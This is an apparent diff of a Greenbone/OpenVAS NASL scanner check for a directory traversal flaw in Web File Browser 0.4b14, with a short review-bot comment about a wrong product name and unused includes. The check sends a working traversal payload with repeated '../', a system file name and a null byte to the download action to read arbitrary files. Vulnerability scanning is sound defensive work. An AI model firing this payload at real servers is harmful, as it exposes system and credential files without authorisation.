+ Successful exploitation could allow attackers to download and read arbitrary
+ files on the affected application.
+
+ Impact Level: Application
+
+ Affected Software/OS:
+ Web File Browser versions 0.4b14 and prior
+
+ Fix: No solution or patch is available as on 09th November, 2011. Information
+ regarding this issue will be updated once the solution details are available.
+ For updates refer, http://webfilebrowser.sourceforge.net/
+
+ References:
+ http://xforce.iss.net/xforce/xfdb/71131
+ http://www.exploit-db.com/exploits/18070/
+ http://www.securityfocus.com/bid/50508/exploit ";
+
+ script_description(desc);
+ script_summary("Check for file download vulnerability in Web File Browser");
+ script_category(ACT_ATTACK);
+ script_copyright("Copyright (c) 2011 Greenbone Networks GmbH");
+ script_family("Web application abuses");
+ script_require_ports("Services/www", 80);
+ exit(0);
+}
+
+##
+## The script code starts here
+##
+
+include("http_func.inc");
+include("host_details.inc");
+include("version_func.inc");
+include("http_keepalive.inc");
+
+## Get HTTP Port
+port = get_http_port(default:80);
+if(!port){
+ exit(0);
+}
+
+## Check Host Supports PHP
+if(!can_host_php(port:port)){
+ exit(0);
+}
+
+foreach dir (make_list("/webFileBrowser", "/webfilebrowser", "/", cgi_dirs()))
+{
+ ## Send and Receive the response
+ sndReq = http_get(item:string(dir, "/webFileBrowser.php"), port:port);
+ rcvRes = http_send_recv(port:port, data:sndReq);
+
+ ## Confirm application is NetArt Media Car Portal
+ if("<title>Web File Browser" >< rcvRes)
+ {
+ ## traversal_files() function Returns Dictionary (i.e key value pair)
+ ## Get Content to be checked and file to be check
+ files = traversal_files();
+
+ foreach file (keys(files))
+ {
+ ## Construct directory traversal attack
+ url = string(dir, "/webFileBrowser.php?act=download&subdir=&sortby=name&file=",
+ crap(data:"../",length:6*9),files[file],"%00");
+
+ ## Confirm exploit worked properly or not
+ if(http_vuln_check(port:port, url:url,pattern:file))
+ {
+ security_hole(port:port);
+ exit(0);
+ }
+ }
+ }
+}
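Review bot: The comment `## Confirm application is NetArt Media Car Portal` above the `<title>Web File Browser` check was copied from another script and names the wrong product; it should read `## Confirm application is Web File Browser`. `host_details.inc` and `version_func.inc` are included but nothing in the script uses them, so drop those two includes.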